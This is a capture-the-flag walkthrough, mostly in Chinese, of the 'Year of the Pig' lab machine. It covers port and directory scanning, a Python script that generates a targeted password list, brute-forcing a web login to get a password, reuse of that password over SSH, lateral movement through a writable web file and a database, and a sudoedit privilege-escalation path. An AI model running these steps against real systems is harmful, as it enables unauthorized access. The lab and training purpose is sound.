Year of the Pig

端口扫描

root@ip-10-10-214-144:~/yearofthepig# nmap -sTCV -p- --min-rate 1000 10.10.31.194

Starting Nmap 7.60 ( https://nmap.org ) at 2023-11-04 09:43 GMT
Nmap scan report for ip-10-10-31-194.eu-west-1.compute.internal (10.10.31.194)
Host is up (0.00036s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Marco's Blog
MAC Address: 02:88:C4:7F:C8:67 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.27 seconds

80

root@ip-10-10-214-144:~/yearofthepig# gobuster dir -u http://10.10.31.194 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.31.194
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     html,php,txt
[+] Timeout:        10s
===============================================================
2023/11/04 09:44:10 Starting gobuster
===============================================================
/index.html (Status: 200)
/login.php (Status: 200)
/admin (Status: 301)
/assets (Status: 301)
/css (Status: 301)
/js (Status: 301)
/api (Status: 301)
/server-status (Status: 403)
===============================================================
2023/11/04 09:45:53 Finished
===============================================================

当我进行访问后, 发现其可能的利用位置在于登陆之处,因为其存在一个提示信息

所以我们应该搜集网站的一些单词来组成字典进行攻击, 在文章中作者提到其最喜欢 savoia 飞机, 我们可以尝试基于此来进行攻击

import string
str1 = "savoia"
for i in range(100):
    for sp in string.punctuation:
        print(f"{str1.upper()} {str(i).zfill(2)}{sp}")
        print(f"{str1.lower()} {str(i).zfill(2)}{sp}")

使用此生成密码字典后, 进行一些简单的操作

root@ip-10-10-214-144:~/yearofthepig# python main.py > pass.txt
root@ip-10-10-214-144:~/yearofthepig# cat pass.txt | md5sum
b2030298d79d4135a5e1c1eaf91282cc  -
root@ip-10-10-214-144:~/yearofthepig# while IFS= read -r line; do
>    echo -n "$line "
>    echo -n "$line" | md5sum | awk '{print $1}'
> done < pass.txt > word.txt

之后进行爆破, 得到账号: marco:savoia21! 同时使用此进行登陆管理页面:

• 发现一个命令执行页面, 但是存在某些限制
• 发现两个用户 : marco、curtis,

后渗透

marco

使用得到的账号进行 SSH 登陆

marco —> curtis

因为之前在网站中发现 curtis 用户, 同时 marco 用户存在密码重用问题, 所以 curtis 用户应该也是一样的思路, 查看网站资源文件后, 发现其是读取 /var/www/admin.db 但是这个文件只有 www-data 用户有权限操作, 同时 marco 用户属于 web-developers 组从名字来看这是一个 web 用户我们可以尝试利用 marco 用户修改网站的文件 - 上面不能使用的命令执行文件, 修改 admin.db 的权限来实现读取, 并且查看 admin.db 文件发现其中存在一个密码同时可以解密

curtis —> root

我发现用户 curtis 存在 SUDO 权限, 同时我也发现了利用方式, 但是我们首先要使用 marco 用户创建对应的 config.php 文件

curtis@year-of-the-pig:/home$ sudo -l
[sudo] password for curtis: 
Matching Defaults entries for curtis on year-of-the-pig:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH"

User curtis may run the following commands on year-of-the-pig:
    (ALL : ALL) sudoedit /var/www/html/*/*/config.php

Sudoedit Privilege Escalation | Exploit Notes